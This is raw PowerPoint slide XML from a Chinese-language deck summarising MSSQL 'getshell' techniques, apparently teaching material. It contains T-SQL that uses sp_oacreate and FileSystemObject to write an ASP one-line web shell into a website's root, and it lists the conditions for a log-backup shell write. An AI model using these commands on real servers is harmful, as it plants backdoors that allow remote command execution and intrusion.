        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EBB4AF2-4080-4784-8F9D-31423F6A6E3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1199615" y="4516720"/>
            <a:ext cx="9347200" cy="1272394"/>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ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>declare @o int, @f int, @t int, @ret int</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>scripting.filesystemobject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>', @o out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sp_oamethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> @o, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>createtextfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>', @f out, 'c:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>inetpub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>wwwroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>\shell.asp', 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec @ret = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sp_oamethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> @f, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>writeline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>', NULL,'&lt;%execute(request("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>"))%&gt;'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1867" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6567006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a:t>MSSQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>etshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>总结</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7956BA4-BB21-4982-B11F-09A2D7BE5396}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578296" y="893662"/>
            <a:ext cx="11035409" cy="56630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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Getshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>总结</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条件</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marL="228594" indent="-228594">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Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>路径已知</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>权限</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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>备份写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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优点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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重复性好，多次备份的成功率高</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>相对于差异备份而言，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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的体积较小</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利用条件：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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至少</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DBO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>权限，默认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>满足</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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前提得知绝对路径，并且可写</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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站库不分离，数据库跟网站在同一台服务器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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数据库必须被备份过一次</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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1244988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a:t>MSSQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>etshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>总结</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7956BA4-BB21-4982-B11F-09A2D7BE5396}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578296" y="893661"/>
            <a:ext cx="11035409" cy="2339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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Getshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>总结</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条件</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marL="228594" indent="-228594">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Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>路径已知</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>权限</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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>备份写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9191C9D-5175-4D95-97C6-32E837A5B5C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1422399" y="3127071"/>
            <a:ext cx="9347200" cy="1703474"/>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ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>use test;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1467" dirty="0"/>
              <a:t>选中数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>alter database test set recovery full;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1467" dirty="0"/>
              <a:t>设置恢复模式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>IF EXISTS(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
